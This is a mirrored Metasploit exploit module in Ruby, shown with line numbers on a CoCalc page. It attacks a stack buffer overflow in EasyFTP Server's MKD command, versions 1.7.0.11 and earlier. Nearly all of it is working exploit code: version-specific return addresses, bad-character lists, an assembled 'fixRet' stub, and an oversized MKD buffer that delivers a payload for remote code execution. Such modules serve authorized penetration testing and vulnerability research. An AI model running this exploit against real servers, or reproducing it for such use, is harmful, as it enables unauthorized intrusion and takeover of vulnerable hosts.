Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb
24557 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Ftp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'EasyFTP Server MKD Command Stack Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11

18
          and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which

19
          leads to a stack based buffer overflow.

20


21
          NOTE: EasyFTP allows anonymous access by default. However, in order to access the

22
          'MKD' command, you must have access to an account that can create directories.

23


24
          After version 1.7.0.12, this package was renamed "UplusFtp".

25


26
          This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'.

27
          This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by

28
          'fixing' the return address post-exploitation.  See references for more information.

29
        },

30
        'Author' => [

31
          'x90c <geinblues[at]gmail.com>', # original version

32
          'jduck' # port to metasploit / modified to use fix-up stub (works with bigger payloads)

33
        ],

34
        'License' => MSF_LICENSE,

35
        'References' => [

36
          [ 'CVE', '2011-10005' ],

37
          [ 'OSVDB', '62134' ],

38
          [ 'EDB', '12044' ],

39
          [ 'EDB', '14399' ]

40
        ],

41
        'DefaultOptions' => {

42
          'EXITFUNC' => 'thread'

43
        },

44
        'Privileged' => false,

45
        'Payload' => {

46
          'Space' => 512,

47
          'BadChars' => "\x00\x0a\x0d\x2f\x5c",

48
          'DisableNops' => true

49
        },

50
        'Platform' => 'win',

51
        'Targets' => [

52
          [ 'Windows Universal - v1.7.0.2', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe

53
          [ 'Windows Universal - v1.7.0.3', { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe

54
          [ 'Windows Universal - v1.7.0.4', { 'Ret' => 0x004041dc } ], # call ebp - from ftpbasicsvr.exe

55
          [ 'Windows Universal - v1.7.0.5', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe

56
          [ 'Windows Universal - v1.7.0.6', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe

57
          [ 'Windows Universal - v1.7.0.7', { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe

58
          [ 'Windows Universal - v1.7.0.8', { 'Ret' => 0x00404481 } ], # call ebp - from ftpbasicsvr.exe

59
          [ 'Windows Universal - v1.7.0.9', { 'Ret' => 0x00404441 } ], # call ebp - from ftpbasicsvr.exe

60
          [ 'Windows Universal - v1.7.0.10', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe

61
          [ 'Windows Universal - v1.7.0.11', { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe

62
        ],

63
        'DisclosureDate' => '2010-04-04',

64
        'DefaultTarget' => 0,

65
        'Notes' => {

66
          'Reliability' => UNKNOWN_RELIABILITY,

67
          'Stability' => UNKNOWN_STABILITY,

68
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

69
        }

70
      )

71
    )

72
  end

73


74
  def check

75
    connect

76
    disconnect

77


78
    if (banner =~ /BigFoolCat/)

79
      return Exploit::CheckCode::Detected

80
    end

81


82
    return Exploit::CheckCode::Safe

83
  end

84


85
  def make_nops(num)

86
    "C" * num

87
  end

88


89
  def exploit

90
    connect_login

91


92
    # NOTE:

93
    # This exploit jumps to ebp, which happens to point at a partial version of

94
    # the 'buf' string in memory. The fixRet below fixes up the code stored on the

95
    # stack and then jumps there to execute the payload. The value in esp is used

96
    # with an offset for the fixup.

97
    fixRet_asm = %q{

98
      mov edi,esp

99
      sub edi, 0xfffffe10

100
      mov [edi], 0xfeedfed5

101
      add edi, 0xffffff14

102
      jmp edi

103
    }

104
    fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string

105


106
    buf = ''

107


108
    print_status("Prepending fixRet...")

109
    buf << fixRet

110
    buf << make_nops(0x20 - buf.length)

111


112
    print_status("Adding the payload...")

113
    buf << payload.encoded

114


115
    # Patch the original stack data into the fixer stub

116
    buf[10, 4] = buf[268, 4]

117


118
    print_status("Overwriting part of the payload with target address...")

119
    buf[268, 4] = [target.ret].pack('V') # put return address @ 268 bytes

120


121
    print_status("Sending exploit buffer...")

122
    send_cmd(['MKD', buf], false)

123


124
    handler

125
    disconnect

126
  end

127
end

128


129